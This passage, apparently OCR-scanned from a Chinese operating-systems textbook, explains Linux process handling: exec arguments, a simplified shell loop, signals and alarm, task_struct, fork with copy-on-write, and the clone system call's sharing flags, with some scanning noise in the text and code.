行文 件 同 时 把 需要 复制 的 文件 信息 传递 给 它 。 
cp 的 主 程序 (还 有 很 多 其 他 的 程序 ) 包含 一 个 函数 声明 : 


main(argc, argv, envp) 


在 这 里 ， 参 数 argc 表 示 命 令 行 中 包括 程序 名 的 项 的 数目 。 在 上 面 所 举 的 例子 中 ，argc 的 值 为 3 。 

第 二 个 参数 argv 是 一 个 指向 数组 的 指针 。 数 组 的 第 i 项 是 一 个 指向 命令 行 中 第 i 个 字符 串 的 指针 。 在 
此 例 中 ，argv[0] 指 向 字符 串 “cp”。 以 此 类 推 ，argv[1] 指 向 五 字 节 长 度 的 字符 串 “file1”，argv[2] 指 向 五 
字 节 长 度 的 字符 串 “file2”。 

main 的 第 三 个 参数 envp 是 一 个 指向 环境 的 指针 ， 这 里 的 环境 ， 是 指 一 个 包含 若干 个 形 如 name = 
value 赋 值 语 句 的 字符 串 数组 ， 这 个 数组 将 传递 终端 类 型 、 主 目录 名 等 信息 给 程序 。 在 图 10-7 中 ， 没 有 要 
传 给 子 进程 的 环境 列表 ， 所 以 在 这 里 ，execve 国 数 的 第 三 个 参数 是 0。 


while (TRUE) { 人 # 永 远 重 复 #/ 
type_prompt( ); 必 在 屏幕 上 显示 提示 符 #/ 
read_command(command, params); 让 从 键盘 读 取 输入 行 */ 
pid = fork( ); /# 创 建 子 进程 */ 
if (pid < 0) { 
printf("Unable to fork 0"); /# 错 误 状 态 #/ 


continue; /#* 重 复 循环 */ 


if (pid != 0) { 
waitpid (-1, &status, 0); * 父 进程 等 待 子 进程 */ 
} else { 
execve(command, params, 0); 


信子 进程 执行 操作 */ 





图 10-7 一 个 高 度 简 化 的 shell 


如 果 exec 函 数 看 起 来 太 复杂 了 ， 不 要 泄气 ， 这 已 经 是 最 复杂 的 系统 调用 了 ， 剩 下 的 要 简单 很 多 。 
作为 一 个 简单 的 例子 ， 我 们 来 考虑 exit 函 数 ， 进 程 在 结束 运行 时 会 调用 这 个 函数 。 它 有 一 个 参数 ， 即 退 
出 状态 (从 0 到 255)， 这 个 参数 的 值 最 后 会 传递 给 父 进 程 调 用 waitpid 函 数 的 第 二 个 参数 一 一 状态 参数 。 
状态 参数 的 低 字 节 部 分 包含 着 结束 状态 ，0 意 味 着 正常 结束 ， 其 他 的 值 代表 各 种 不 同 的 错误 。 状 态 参数 
的 高 字 节 部 分 包含 着 子 进程 的 退出 状态 (从 0 到 255)， 其 值 由 子 进程 调用 的 exit 系 统 调用 指定 。 例 如 ， 如 
果 父 进程 执行 如 下 语句 : 

n = waitpid(—1, &status, 0); 

它 将 一 直 处 于 挂 起 状态 ， 直 到 有 子 进 程 结束 运行 。 如 果子 进程 退出 时 以 4 作为 exit 函 数 的 参数 ， 父 进程 将 
会 被 唤醒 ， 同 时 将 变量 n 设 置 为 子 进程 的 PID， 变 量 status 设 置 为 0x0400 (在 C 语 言 中 ， 以 0x 作 为 前 绥 表 
示 十 六 进 制 )。 变 量 status 的 低 字 节 与 信号 有 关 ， 高 字 节 是 子 进程 返回 时 调用 exit 函 数 的 参数 值 。 

如 果 一 个 进程 退出 但 是 它 的 父 进程 并 没有 在 等 待 它 ， 这 个 进程 进入 僵 死 状态 (zombie state) 。 最 后 
当 父 进程 等 待 它 时 ， 这 个 进程 才 会 结束 。 

一 些 与 信号 相关 的 系统 调用 以 各 种 各 样 的 方式 被 运用 。 比 方 说 ， 如 果 一 个 用 户 偶 然 间 命 令 文字 编辑 
器 显示 一 篇 超 长 文档 的 全 部 内 容 ， 然 后 意识 到 这 是 一 个 误 操 作 ， 这 就 需要 采用 某 些 方法 来 打 断 文字 编辑 
器 的 工作 。 对 于 用 户 来 说 ， 最 常用 的 选择 是 硕 击 某 些 特定 的 键 (如 DEL 或 者 CTRL-C 等 ) ， 从 而 给 文字 编 
辑 器 发 送 一 个 信和 号。 文字 编 辑 器 捕捉 到 这 个 信和 号， 然后 停止 显示 。 

为 了 表明 所 关心 的 信号 有 哪些 ， 进 程 可 以 调用 系统 调用 sigaction。 这 个 函数 的 第 一 个 参数 是 希望 捕 
捉 的 信号 〈 如 图 10-5 所 示 ) 。 第 二 个 参数 是 一 个 指向 结构 的 指针 ， 在 这 个 结构 中 包括 一 个 指向 信号 处 理 
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函数 的 指针 以 及 一 些 其 他 的 位 和 标志 。 第 三 个 参数 也 是 一 个 指向 结构 的 指针 ， 这 个 结构 接收 系统 返回 的 
当前 正在 进行 的 信号 处 理 的 相关 信息 ， 有 可 能 以 后 这 些 信息 需要 恢复 。 

这 号 处 理 函 数 可 以 运行 任意 长 的 时 间 。 尽 管 如 此 ， 在 实践 当中 ， 通 常情 况 下 信号 处 理 函 数 都 非常 短 
小 精 悍 。 当 信和 号 处 理 完毕 之 后 ， 控 制 返回 到 断 点 处 继续 执行 。 

sigaction 系 统 调用 也 可 以 用 来 忽略 一 个 信号 ， 或 者 恢复 为 一 个 杀 死 进程 的 缺 省 操作 。 

敲 击 DEL 键 并 不 是 发 送信 号 的 唯一 方式 。 系 统 调用 kill 允 许 一 个 进程 给 它 相 关 的 进程 发 送信 号 。 选 
择 “kill” 作 为 这 个 系统 调用 的 名 字 其 实 并 不 是 十 分 贴切 ， 因 为 大 多 数 进程 发 送信 号 给 别 的 进程 只 是 为 
了 信和 号 能 够 被 捕捉 到 。 然 而 ， 如 果 一 个 信号 没有 被 接收 者 捕获 ， 那 么 接收 者 将 被 该 信号 杀 死 。 

对 于 很 多 实时 应 用 程序 ， 在 一 段 特 定 的 时 间 间 隔 之 后 ， 一 个 进程 必须 被 打 断 ， 系 统 会 转 去 做 一 些 其 
他 的 事情 ， 比 如 说 在 一 个 不 可 信 的 信道 上 重新 发 送 一 个 可 能 丢失 的 数据 包 。 为 了 处 理 这 种 情况 ， 系 统 提 
供 了 alarm 系 统 调 用 。 这 个 系统 调用 的 参数 规定 了 一 个 以 秒 为 单位 的 时 间 间 隔 ， 这 个 时 间 间 隔 过 后 ， 一 个 
名 为 SIGALRM 的 信号 会 被 发 送 给 进程 。 一 个 进程 在 某 一 个 特定 的 时 刻 只 能 有 唯一 一 个 未 处 理 的 警报 。 如 
果 alarm 系 统 调用 首先 以 10 秒 为 参数 被 调用 ，3 秒 钟 之 后 ， 又 以 20 秒 为 参数 被 调用 ， 那 么 只 会 生成 一 个 
SIGALRM 信 号 ， 这 个 信号 生成 在 第 二 次 调用 alarm 系 统 调用 的 20 秒 之 后 。 第 一 次 alarm 系 统 调 用 设置 的 信 
号 被 第 二 次 alarm 系 统 调用 取消 了 。 如 果 alarm 系 统 调用 的 参数 为 0, 任何 即将 发 生 的 警报 信号 都 会 被 取消 。 
如 果 没 有 捕捉 到 警报 信号 ， 将 会 采取 默认 的 处 理 方式 ， 收 取信 号 的 进程 将 会 被 杀 死 。 从 技术 角度 来 讲 ， 
警报 信号 是 可 以 忽略 的 ， 但 是 这 样 做 毫 无 意义 。 为 什么 要 求 信号 提醒 的 程序 后 来 却 忽略 该 信号 呢 ? 

有 些 时 候 会 发 生 这 样 的 情况 ， 在 信和 号 到 来 之 前 ， 进 程 无 事 可 做 。 比 如 说 ， 考 虑 一 个 用 来 测试 阅读 速 
度 和 理解 能 力 的 计算 机 辅助 教学 程序 。 它 在 屏幕 上 显示 一 些 文本 然后 调用 alarm 函 数 于 30 秒 后 生成 一 个 
警报 信号 。 当 学 生 读 课 文 的 时 候 ， 程 序 就 无 事 可 做 。 它 可 以 进入 空 循环 而 不 做 任何 事情 ， 但 是 这 样 一 来 
就 会 浪费 其 他 后 台 程序 或 用 户 急需 的 CPU 时 间 。 一 个 更 好 的 解决 办 法 就 是 使 用 pause 系 统 调用 ， 它 会 通 
知 Linux 系 统 将 本 进程 挂 起 直到 下 一 个 信号 到 来 。 


10.3.3 Linux 中 进程 与 线程 的 实现 

Linux 系 统 中 的 一 个 进程 就 像 是 一 座 冰山 : 你 所 看 见 的 不 过 是 它 露 出 水 面 的 部 分 ， 而 很 重要 的 一 部 
分 隐藏 在 水 下 。 每 一 个 进程 都 有 一 个 运行 用 户 程序 的 用 户 模式 。 但 是 当 它 的 某 一 个 线程 调用 系统 调用 之 
后 ， 进 程 会 陷入 内 核 模 式 并 且 运 行 在 内 核 上 下 文中 ， 它 将 使 用 不 同 的 内 存 映 射 并 且 拥 有 对 所 有 机 器 资源 
的 访问 权 。 它 还 是 同一 个 线程 ， 但 是 现在 拥有 更 高 的 权限 ， 同 时 拥有 自己 的 内 核 堆栈 以 及 内 核 程序 计数 
器 。 这 几 点 非常 重要 ， 因 为 一 个 系统 调用 可 能 会 因为 某 些 原因 陷入 阻塞 态 ， 比 如 说 ， 等 待 一 个 磁盘 操作 
的 完成 。 这 时 程序 计数 器 和 寄存 器 内 容 会 被 保存 下 来 使 得 不 久之 后 线程 可 以 在 内 核 模式 下 继续 运行 。 

在 Linux 系 统 内 核 中 ， 进 程 通过 数据 结构 task_struct 被 表示 成 任务 (task) 。 不 像 其 他 的 操作 系统 会 区 
别 进程 、 轻 量 级 进程 和 线程 ，Linux 系 统 用 任务 的 数据 结构 来 表示 所 有 的 执行 上 下 文 。 所 以 ， 一 个 单线 
程 的 进程 只 有 一 个 任务 数据 结构 ， 而 一 个 多 线程 的 进程 将 为 每 一 个 用 户 级 线程 分 配 一 个 任务 数据 结构 。 
最 后 ，Linux 的 内 核 是 多 线程 的 ， 并且 它 所 拥有 的 是 与 任何 用 户 进程 无 关 的 内 核 级 线程 ， 这 些 内 核 级 线 
程 执 行内 核 代码 。 稍 后 ， 本 节 会 重新 关注 多 线程 进程 (一般 来 讲 就 是 线程 ) 的 处 理 方式 。 

对 于 每 一 个 进程 ， 一 个 类 型 为 task_struct 的 进程 描述 符 是 始终 存在 于 内 存 当 中 的 。 它 包含 了 内 核 管 
理 全 部 进程 所 需 的 重要 信息 ， 如 调度 参数 、 已 打开 的 文件 描述 符 列表 等 。 进 程 描述 符 从 进程 被 创建 开始 
就 一 直 存 在 于 内 核 堆栈 之 中 。 

为 了 与 其 他 UNIX 系 统 兼容 ，Linux 还 通过 进程 标识 符 (PID) 来 区 分 进程 。 内 核 将 所 有 进程 的 任务 
数据 结构 组 织 成 一 个 双向 链表 。 不 需要 遍历 这 个 链表 来 访问 进程 描述 符 ，PID 可 以 直接 被 映射 成 进程 的 
任务 数据 结构 所 在 的 地 址 ， 从 而 立即 访问 进程 的 信息 。 

任务 数据 结构 包含 非常 多 的 分 量 。 其 中 一 些 分 量 包含 指向 其 他 数据 结构 或 段 的 指针 ， 比 如 说 包含 关 
于 已 打开 文件 的 信息 。 有 些 段 只 与 进程 用 户 级 的 数据 结构 有 关 ， 当 用 户 进程 没有 运行 的 时 候 ， 它 们 是 不 
被 关注 的 。 所 以 ， 当 不 需要 它们 的 时 候 ， 这 些 段 可 以 被 交换 出 去 或 重新 分 页 以 达到 不 浪费 内 存 的 目的 。 
举 个 例子 ， 尽 管 对 于 一 个 进程 来 说 ， 当 它 被 交换 出 去 的 时 候 ， 可 能 会 有 其 他 进程 给 它 发 送信 号 ， 但 是 这 
个 进程 本 身 却 不 会 要 求 读 取 一 个 文件 。 正 因为 如 此 ， 关 于 信号 的 信息 才 必 须 永远 保存 在 内 存 里 ， 即 使 这 
个 进程 已 经 不 在 内 存 当 中 了 。 另 一 方面 ， 关 于 文件 描述 符 的 信息 可 以 被 保存 在 用 户 级 的 数据 结构 里 ， 当 
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进程 存在 于 内 存 当 中 并 且 可 以 执行 的 时 候 ， 这 些 信息 才 需 要 被 调 人 内 存 。 

进程 描述 符 的 信息 可 以 大 致 归纳 为 以 下 几 大 类 : 

1) 调度 参数 。 进 程 优 先 级 ， 最 近 消耗 的 CPU 时 间 ， 最 近 睡 眠 的 时 间 。 上 面 几 项 内 容 结合 在 一 起 决定 
了 下 一 个 要 运行 的 进程 是 哪 一 个 。 

2) 内 存 映 射 。 指 向 代码 、 数 据 、 堆 栈 段 或 页 表 的 指针 。 如 果 代 码 段 是 共享 的 ， 代 码 指针 指向 共享 代 
码 表 。 当 进程 不 在 内 存 当 中 时 ， 关 于 如 何在 磁盘 上 找到 这 些 数据 的 信息 也 被 保存 在 这 里 。 

3) 信号 。 掩 码 显示 了 哪些 信号 被 忽略 、 哪 些 信号 需要 被 捕捉 、 哪 些 信号 被 暂时 阻塞 以 及 哪些 信号 在 
传递 当中 。 

4) 机 器 寄存 器 。 当 内 核 陷阱 发 生 时 ， 机 器 寄存 器 的 内 容 (也 包括 被 使 用 了 的 浮 点 寄存 器 的 内 容 ) 会 
被 保存 。 

5) 系统 调用 状态 。 关 于 当前 系统 调用 的 信息 ， 包 括 参数 和 返回 值 。 

6) 文件 描述 符 表 。 当 一 个 与 文件 描述 符 有 关 的 系统 调用 被 调用 的 时 候 ， 文 件 描述 符 作为 索引 在 文件 
描述 符 表 中 定位 相关 文件 的 i 节 点 数据 结构 。 

7) 统计 数据 。 指 向 记录 用 户 、 进 程 占 用 系统 CPU 时 间 的 表 的 指针 。 一 些 系统 还 保存 一 个 进程 最 多 可 
以 占用 CPU 的 时 间 、 进 程 可 以 拥有 的 最 大 堆栈 空间 、 进 程 可 以 消耗 的 页 面 数 等 。 

8) 内 核 堆 栈 。 进 程 的 内 核 部 分 可 以 使 用 的 固定 堆栈 。 

9) 其 他 。 当 前 进程 状态 。 如 果 有 的 话 ， 包 括 正在 等 待 的 事件 、 距 离 警 报时 钟 超时 的 时 间 、PID、 父 
进程 的 PID 以 及 其 他 用 户 标 识 符 、 组 标识 符 等 。 

记 住 这 些 信息 ， 现 在 可 以 很 容易 地 解释 在 Linux 系 统 中 是 如 何 创建 进程 的 。 实 际 上 ， 创 建 一 个 新 进 
程 的 机 制 非常 简单 。 为 子 进程 创建 一 个 新 的 进程 描述 符 和 用 户 空间 ， 然 后 从 父 进程 复制 大 量 的 内 容 。 这 
个 子 进程 被 赋予 一 个 PID ， 并 建立 它 的 内 存 映射 ， 同 时 它 也 被 赋予 了 访问 属于 父 进程 文件 的 权限 。 然 后 ， 
它 的 寄存 器 内 容 被 初始 化 并 准备 运行 。 

当 系 统 调用 fork 执 行 的 时 候 ， 调 用 fork 函 数 的 进程 陷入 内 核 并 且 创 建 一 个 任务 数据 结构 和 其 他 相关 
的 数据 结构 ， 如 内 核 堆栈 和 thread_info 结 构 。 这 个 结构 位 于 进程 堆栈 栈 底 固定 偏 移 量 的 地 方 ， 包 含 一 些 
进程 参数 ， 以 及 进程 描述 符 的 地 址 。 把 进程 描述 符 的 地 址 存储 在 一 个 固定 的 地 方 ， 使 得 Linux 系 统 只 需 
要 进行 很 少 的 有 效 操作 就 可 以 定位 到 一 个 运行 中 进程 的 任务 数据 结构 。 

进程 描述 符 的 主要 内 容 根据 父 进程 的 进程 描述 符 的 值 来 填充 。Linux 系 统 寻找 一 个 可 用 的 PID ， 且 该 
PID 此 刻 未 被 任何 进程 使 用 。 更 新 进程 标识 符 散 列表 的 表 项 使 之 指向 新 的 任务 数据 结构 即 可 。 以 防 散 列 
表 发 生 冲 突 ， 相 同 键 值 的 进程 描述 符 会 被 组 成 链表 。 它 会 把 task_struct 结 构 中 的 一 些 分 量 设置 为 指向 任 
务 数组 中 相应 进程 的 前 一 /后 一 进程 的 指针 。 

理论 上 ， 现 在 就 应 该 为 子 进程 的 数据 段 、 堆 栈 段 分 配 内 存 ， 并 且 对 父 进程 的 段 进 行 复制 ， 因 为 fork 
函数 意味 着 父 、 子 进程 之 间 不 共享 内 存 。 其 中 如 果 代 码 段 是 只 读 的 ， 可 以 复制 也 可 以 共享 。 然 后 ， 子 进 
程 就 可 以 运行 了 。 

但 是 ， 复 制 内 存 的 代价 相当 昂贵 ， 所 以 现代 Linux 系 统 都 使 用 了 “欺骗 ”的 手段 来 代替 。 它 们 赋予 
子 进程 属于 它 的 页 表 ， 但 是 这 些 页 表 都 指向 父 进程 的 页 面 ， 同 时 把 这 些 页 面 标记 成 只 读 。 当 进程 (可 以 
是 子 进程 或 父 进程 ) 试图 向 某 一 页 面 中 写 人 数据 的 时 候 ， 它 会 收 到 写 保护 的 错误 。 内 核发 现 进程 的 写 人 
行为 之 后 ， 会 为 进程 分 配 一 个 该 页 面 的 新 副本 ， 并 将 这 个 副本 标记 为 可 读 、 可 写 。 通 过 这 种 方式 ， 使 得 
只 有 需要 写 入 数据 的 页 面 才 会 被 复制 。 这 种 机 制 叫 作 写 时 复制 。 它 所 带 来 的 额外 好 处 是 ， 不 需要 在 内 存 
中 维护 同一 个 程序 的 两 个 副本 ， 从 而 节省 了 RAM。 

子 进 程 开 始 运行 之 后 ， 运 行 代 码 (本 章 以 shell 的 副本 作为 例子 ) 调用 系统 调用 exec， 将 命令 名 作为 
exec 函 数 的 参数 。 内 核 找到 并 验证 相应 的 可 执行 文件 ， 把 参数 和 环境 变量 复制 到 内 核 ， 释 放 旧 的 地 址 空 
间 和 页 表 。 

现在 必须 建立 并 填充 新 的 地 址 空间 。 如 果 你 使 用 的 系统 像 Linux 系 统 或 所 有 其 他 实际 基于 UNIX 的 系 
统一 样 支持 映射 文件 ， 新 的 页 表 会 被 创建 ， 并 指出 所 需 的 页 面 不 在 内 存 中 ， 除 非 用 到 的 页 面 是 堆栈 页 ， 
但 是 所 需 的 地 址 空间 在 磁盘 的 可 执行 文件 中 都 有 备份 。 当 新 进程 开始 运行 的 时 候 ， 它 会 立刻 收 到 一 个 缺 
页 中 断 ， 这 会 使 得 第 一 个 含有 代码 的 页 面 从 可 执行 文件 调 入 内存。 通过 这 种 方式 ， 不 需要 预先 加 载 任何 
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东西 ， 所 以 程序 可 以 快速 地 开始 运行 ， 只 有 在 所 需 页 面 不 在 内 存 中 时 才 会 发 生 页 面 错误 (这 种 情况 是 第 
3 章 中 讨论 的 最 纯粹 的 按 需 分 页 机 制 )。 最 后 ， 参 数 和 环境 变量 被 复制 到 新 的 堆栈 中 ， 信 和 号 被 重 置 ， 寄 存 
器 被 全 部 清 零 。 从 这 里 开始 ， 新 的 命令 就 可 以 运行 了 。 

图 10-8 通 过 下 面 的 例子 解释 了 上 述 的 步 又: 某 用 户 在 终端 键入 一 个 命令 Is，shell 调 用 fork 函 数 复制 
自身 以 创建 一 个 新 进程 。 新 的 shell 进 程 调用 exec 函 数 用 可 执行 文件 1s 的 内 容 覆 盖 它 的 内 存 。 完 成 后 ,1s 
开始 运行 。 


PID = 501 PID = 748 PID = 748 





分 配子 进程 任务 数据 结构 寻找 可 执行 程序 

从 父 进程 处 得 到 数据 填写 子 进程 任务 数据 结构 。” 验证 执行 许可 

分 配子 进程 堆栈 和 用 户 空 间 读 取 和 验证 头 文件 

从 父 进程 处 得 到 数据 填写 子 进程 用 户 空间 给 内 核 复制 变量 、 环 境 参 数 
为 子 进 程 分 配 PID 释放 旧 的 地 址 空间 

设置 子 进程 以 共享 父 进程 的 正文 分 配 新 的 地 址 空间 

为 数据 和 堆栈 复制 页 表 为 堆栈 复制 变量 、 环 境 参数 
设置 共享 打开 文件 信号 复位 

为 子 进程 复制 父 进程 的 寄存 器 初始 化 寄存 器 


图 10-8 shell 执 行 命令 1s 的 步骤 


Linux 中 的 线程 

我 们 在 第 2 章 中 概括 性 地 介绍 了 线程 。 在 这 里 ， 我 们 重点 关注 Linux 系 统 的 内 核 线 程 ， 特 别 是 Linux 
系统 中 线程 模型 与 其 他 UNIX 系 统 的 不 同 之 处 。 为 了 能 更 好 地 理解 Linux 模 型 所 提供 的 独一无二 的 性 能 ， 
我 们 先 来 讨论 一 些 多 线程 操作 系统 中 存在 的 有 争议 的 决策 。 

引入 线程 的 最 大 和 争议 在 于 维护 传统 UNIX 语 义 的 正确 性 。 首 先 来 考虑 fork 函 数 。 假 设 一 个 多 (内核 ) 
线程 的 进程 调用 了 fork 系 统 调 用 。 所 有 其 他 的 线程 都 应 该 在 新 进程 中 被 创建 吗 ? 我 们 暂时 认为 答案 是 肯 
定 的 。 再 假设 其 他 线程 中 的 其 中 一 个 线程 在 从 键盘 读 取 数 据 时 被 阻塞 。 那 么 ， 新 进程 中 对 应 的 线程 也 应 
该 被 阻塞 么 ?如 果 是 的 话 ， 那 么 哪 一 个 线程 应 该 获得 下 一 行 的 输入 ? 如 果 不 是 的 话 ， 新 进程 中 对 应 的 线 
程 又 应 该 做 什么 呢 ? 同样 的 问题 还 大 量 存在 于 线程 可 以 完成 的 很 多 其 他 的 事情 上 。 在 单线 程 进程 中 ， 由 
于 调用 fork 函 数 的 时 候 ， 唯 一 的 进程 是 不 可 能 被 阻塞 的 ， 所 以 不 存在 这 样 的 问题 。 现 在 ， 考 虑 这 样 的 情 
况 一 一 其 他 的 线程 不 会 在 子 进程 中 被 创建 。 再 假设 一 个 没有 在 子 进程 中 被 创建 的 线程 持 有 一 个 互 斥 变 量 ， 
而 子 进程 中 唯一 的 线程 在 fork 函 数 结束 之 后 要 获得 这 个 互 斥 变量 。 那 么 由 于 这 个 互 斥 变 量 永远 不 会 被 释 
放 ， 所 以 子 进程 中 唯一 的 线程 也 会 永远 挂 起 。 还 有 大 量 其 他 的 问题 存在 。 但 是 没有 简单 的 解决 办 法 。 

文件 输入 /输出 是 另 一 个 问题 。 假 设 一 个 线程 由 于 要 读 取 文件 而 被 阻塞 ， 而 另 一 个 线程 关闭 了 这 个 
文件 ， 或 者 调用 Iseek 函 数 改 变 了 当前 的 文件 指针 。 下 面 会 发 生 什么 事情 呢 ? 谁 能 知道 ? 

信号 的 处 理 是 另 一 个 环 手 的 问题 。 信 号 是 应 该 发 送 给 某 一 个 特定 的 线程 还 是 发 送 给 线程 所 在 的 进程 
呢 ? 一 个 浮 点 运算 异常 信号 SIGFPE 应 该 被 引起 浮 点 运算 异常 的 线程 所 捕获 。 但 是 如 果 它 没有 捕获 到 
呢 ? 是 应 该 只 杀 死 这 个 线程 ， 还 是 杀 死 线程 所 属 进程 中 的 全 部 线程 ? 再 来 考虑 由 用 户 通过 键盘 输入 的 信 
号 SIGINT。 哪 一 个 线程 应 该 捕获 这 个 信号 ?所 有 的 线程 应 该 共享 同样 的 信号 掩 码 吗 ? 通常 ， 解 决 这 些 
或 其 他 问题 的 所 有 方法 会 引发 另 一 些 问题 。 使 线程 的 语义 正确 (不 涉及 代码 ) 不 是 一 件 容易 的 事 。 

Linux 系 统 用 一 种 非常 值得 关注 的 有 趣 的 方式 支持 内 核 线 程 。 具 体 实现 基于 4.4BSD 的 思想 ， 但 是 在 
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那个 版 本 中 内 核 线程 没 能 实现 ， 因 为 在 能 够 解决 上 述 问 题 的 C 语 言 程序 库 被 重新 编写 之 前 ，Berkeley 就 
资金 短缺 了 。 

从 历史 观点 上 说 ， 进 程 是 资源 容器 ， 而 线程 是 执行 单元 。 一 个 进程 包含 一 个 或 多 个 线程 ， 线 程 之 间 共 享 
地 址 空间 、 已 打开 的 文件 、 信 和 号 处 理 函 数 、 警 报信 号 和 其 他 。 像 上 面 描述 的 一 样 ， 所 有 的 事情 简单 而 清晰 。 

2000 年 的 时 候 ，Linux 系 统 引 入 了 一 个 新 的 、 强 大 的 系统 调用 clone， 模 糊 了 进程 和 线程 的 区 别 ， 其 
至 使 得 两 个 概念 的 重要 性 被 倒置 。 任 何其 他 UNIX 系 统 的 版 本 中 都 没有 clone 函 数 。 传 统 观念 上 ， 当 一 个 
新 线程 被 创建 的 时 候 ， 之 前 的 线程 和 新 线程 共享 除了 寄存 器 内 容 之 外 的 所 有 信息 。 特 别 是 ， 已 打开 文件 
的 文件 描述 符 、 信 号 处 理 函 数 、 定 时 器 信号 和 其 他 每 个 进程 (不 是 每 个 线程 ) 都 具有 的 全 局 属性 。 
clone 函 数 可 以 设置 这 些 属性 是 进程 特有 的 还 是 线程 特有 的 。 它 的 调用 方式 如 下 : 


pid = clone(function, stack_ptr, sharing_flags, arg); 


调用 这 个 函数 可 以 在 当前 进程 或 新 的 进程 中 创建 一 个 新 线程 ， 具 体 依赖 于 参数 sharing_flags。 如 果 新 线程 在 当 
前 进程 中 ， 它 将 与 其 他 已 存在 的 线程 共享 地 址 空间 ， 任 何 一 个 线程 对 地 址 空间 做 出 修改 对 于 同一 进程 中 的 其 
他 线程 而 言 都 是 立即 可 见 的 。 另 外 一 种 情况 ， 如 果 地 址 空间 不 是 共享 的 ， 新 线程 会 获得 地 址 空间 的 完整 副本 ， 
但 是 新 线程 对 这 个 副本 进行 的 修改 对 于 旧 的 线程 来 说 是 不 可 见 的 。 这 些 语义 同 POSIX 的 fork 函 数 是 相同 的 。 

在 这 两 种 情况 下 ， 新 线程 都 从 function 处 开始 执行 ， 并 以 arg 作 为 唯一 的 参数 。 同 时 ， 新 线程 还 拥有 
私有 堆栈 ， 其 中 私有 堆栈 的 指针 被 初始 化 为 stack_ptr。 

参数 sharing_flags 是 一 个 位 图 ， 这 个 位 图 允许 比 传统 的 UNIX 系 统 更 加 细 粒 度 的 共享 。 每 一 位 可 以 单 
独 设 置 ， 且 每 一 位 决定 了 新 线程 是 复制 一 些 数据 结构 还 是 与 调用 clone 函 数 的 线程 共享 这 些 数据 结构 。 
图 10-9 显 示 了 根据 sharing_flags 的 设置 ， 哪 些 项 可 以 共享 ， 哪些 项 需要 复制 。 

CLONE_VM 位 决定 了 虚拟 内 存 ( 即 地 址 空间 ) 是 与 旧 的 线程 共享 还 是 需要 复制 。 如 果 该 位 置 1， 新 线 
程 加 入 到 已 存在 的 线程 中 去 ， 即 clone 函 数 在 一 个 已 经 存在 的 进程 中 创建 了 一 个 新 线程 。 如 果 该 位 清 零 ， 
新 线程 会 拥有 私有 的 地 址 空间 。 拥 有 自己 的 地 址 空间 意味 着 存储 的 操作 对 于 之 前 已 经 存在 的 线程 而 言 是 不 
可 见 的 。 这 与 fork 函 数 很 相似 ， 除 了 下 面 提 到 的 一 点 。 创 建新 的 地 址 空间 事实 上 就 定义 了 一 个 新 的 进程 。 


置 位 时 的 含义 清除 时 的 含义 

创建 一 个 新 线程 创建 一 个 新 进程 

共享 umask、 根 目录 和 工作 目录 

共享 文件 描述 符 复制 文件 描述 符 

共享 信号 句柄 表 复制 该 表 

新 线程 获得 旧 的 PID 新 线程 获得 自己 的 PID 
新 线程 与 调用 者 有 相同 的 父亲 新 线程 的 父亲 是 调用 者 


图 10-9 sharing-flags 位 图 中 的 各 个 位 


CLONE_FS 位 控制 着 是 否 共享 根 目 录 、 当 前 工作 目录 和 umask 标 志 。 即 使 新 线程 拥有 自己 的 地 址 空 
间 ， 如 果 该 位 置 !， 新 、 旧 线程 之 间 也 可 以 共享 当前 工作 目录 。 这 就 意味 着 即使 一 个 线程 拥有 自己 的 地 
址 空间 ， 另 一 个 线程 也 可 以 调用 chdir 函 数 改变 它 的 工作 目录 。 在 UNIX 系 统 中 ， 一 个 线程 通常 会 调用 
chdir 函 数 改变 它 所 在 进程 中 其 他 线程 的 当前 工作 目录 ， 而 不 会 对 另 一 进程 中 的 线程 做 这 样 的 操作 。 所 以 
说 ， 这 一 位 引入 了 一 种 传统 UNIX 系 统 不 可 能 具有 的 共享 性 。 

CLONE_FILES 位 与 CLONE_FS 位 相似 。 如 果 该 位 置 1， 新 线程 与 旧 线 程 共 享 文件 描述 符 ， 所 以 一 
个 线程 调用 lseek 函 数 对 另 一 个 线程 而 言 是 可 见 的 。 通 常 ， 这 样 的 处 理 是 对 于 同属 一 个 进程 的 线程 ， 而 
不 是 不 同 进程 的 线程 。 相 似 的 ，CLONE_SIGHAND 位 控制 是 否 在 新 、 旧 线程 间 共 享 信号 句柄 表 。 如 果 
信号 处 理 函 数 表 是 共享 的 ， 即 使 是 在 拥有 不 同 地址 空间 的 线程 之 间 共 享 ， 一 个 线程 改变 某 一 处 理 函 数 也 
会 影响 另 一 个 线程 的 处 理 函 数 。 

最 后 ， 每 一 个 进程 都 有 一 个 父 进程 。CLONE_PARENT 位 控制 着 哪 一 个 线程 是 新 线程 的 父 线程 。 父 
线程 可 以 与 clone 函 数 调用 者 的 父 线程 相同 (在 这 种 情况 下 ， 新 线程 是 clone 函 数 调用 者 的 兄弟 ) ， 也 可 
以 是 clone 函 数 调 用 者 本 身 ， 在 这 种 情况 下 ， 新 线程 是 clone 函 数 调用 者 的 子 线程 。 还 有 另外 一 些 控制 其 
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他 项 目的 位 ， 但 是 它们 不 是 很 重要 。 

由 于 Linux 系 统 为 不 同 的 项 目 维护 了 独立 的 数据 结构 〈 见 10.3.3 小 节 ， 如 调度 参数 、 内 存 映射 等 )， 
因此 细 粒 度 的 共享 成 为 了 可 能 。 任 务 数据 结构 只 需要 指向 这 些 数 据 结构 即 可 ， 所 以 为 每 一 个 线程 创建 一 
个 新 的 任务 数据 结构 变 得 很 容易 ， 或 者 使 它 指向 旧 线 程 的 调度 参数 、 内 存 映射 和 其 他 的 数据 结构 ， 或 者 
复制 它们 。 事 实 上 ， 条 理 分 明 的 共享 性 虽然 成 为 了 可 能 ， 但 并 不 意味 着 它 是 有 益 的 ， 毕 竟 传 统 的 UNIX 
系统 都 没有 提供 这 样 的 功能 。 一 个 利用 了 这 种 共享 性 的 Linux 程 序 将 不 能 移植 到 UNIX 系 统 上 。 

Linux 系 统 的 线程 模型 带 来 了 另 一 个 难题 。UNIX 系 统 为 每 一 个 进程 分 配 一 个 独立 的 PID， 不 论 它 是 
单线 程 的 进程 还 是 多 线程 的 进程 。 为 了 能 与 其 他 的 UNIX 系 统 兼容 ，Linux 对 进程 标识 符 (PID) 和 任务 
标识 符 (TID) 进行 了 区 分 。 这 两 个 分 量 都 存储 在 任务 数据 结构 中 。 当 调用 clone 函 数 创建 一 个 新 进程 而 
不 需要 和 旧 进 程 共享 任何 信息 时 ，PID 被 设置 成 一 个 新 值 ， 否 则 ， 任 务 得 到 一 个 新 的 任务 标识 符 ， 但 是 
